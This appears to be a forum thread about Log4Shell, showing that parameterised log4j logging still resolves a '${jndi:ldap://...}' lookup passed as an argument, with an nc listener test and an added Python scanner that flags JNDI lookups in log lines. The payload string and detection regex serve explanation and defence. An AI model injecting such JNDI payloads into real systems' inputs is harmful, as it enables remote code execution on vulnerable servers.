
I posted this in reply to a sibling comment, but the "correct" way is still vulnerable

Start nc (nc -lp 1234) and run this

    org.apache.logging.log4j.LogManager.getLogger("whatever").error("not safe {}", "${jndi:ldap://127.0.0.1:1234/abc}")
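The point of the comment above is that parameterised logging (`"not safe {}"` plus an argument) offers no protection: log4j substitutes the argument into the message first and only then resolves `${...}` lookups, so a `${jndi:...}` string passed as a parameter is still evaluated. The following is an added illustration, not code from the thread, written in Python from a defender's perspective: it mimics log4j's positional `{}` substitution so the effect is visible, and provides a simple scanner that flags `${jndi:` lookups in already-written log lines. The sample log lines are constructed for the example, the `render` function is a hypothetical stand-in for log4j's own `ParameterizedMessage` formatting (not the real implementation), and the regex only catches the plain `${jndi:...}` form; it is a first-pass detection aid, not a replacement for upgrading log4j.

```python
import re
from typing import List, Tuple

# A log4j-style JNDI lookup token: ${jndi:...}. Non-greedy up to the first
# closing brace so several lookups on one line are reported separately.
JNDI_LOOKUP = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)


def render(template: str, *args: str) -> str:
    """Hypothetical stand-in for log4j's positional {} substitution.

    Each {} in the template is replaced, left to right, by the next argument.
    This is the step that puts an attacker-controlled parameter into the text
    on which log4j later performs lookup resolution.
    """
    out = template
    for arg in args:
        out = out.replace("{}", str(arg), 1)
    return out


def find_jndi_lookups(text: str) -> List[str]:
    """Return every ${jndi:...} token found in the given text."""
    return JNDI_LOOKUP.findall(text)


def scan_log_lines(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Scan already-written log lines; return (line number, lookups) pairs."""
    findings = []
    for number, line in enumerate(lines, start=1):
        hits = find_jndi_lookups(line)
        if hits:
            findings.append((number, hits))
    return findings


# Constructed sample log lines for the example (not real traffic).
SAMPLE_LINES = [
    "2021-12-10 12:00:01 INFO  request from 10.0.0.5 ua=Mozilla/5.0",
    "2021-12-10 12:00:02 ERROR not safe ${jndi:ldap://127.0.0.1:1234/abc}",
    "2021-12-10 12:00:03 INFO  user logged in",
]


def demo() -> List[Tuple[int, List[str]]]:
    """Show that the template is clean but the rendered message is not, then
    return the scanner's findings over the constructed sample lines."""
    template = "not safe {}"
    param = "${jndi:ldap://127.0.0.1:1234/abc}"
    assert find_jndi_lookups(template) == []          # template itself is harmless
    rendered = render(template, param)
    assert find_jndi_lookups(rendered) == [param]     # lookup survives substitution
    return scan_log_lines(SAMPLE_LINES)


if __name__ == "__main__":
    for number, hits in demo():
        print(f"line {number}: {hits}")
```

Run as a script it prints the one flagged sample line; the useful lesson is in `demo()`: checking the format string alone is not a control, because the lookup arrives through the parameter and is present in the rendered message that log4j actually processes.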



Thanks, didn't realise that. So the issue is deeper than misuse of user input (I've edited my post).



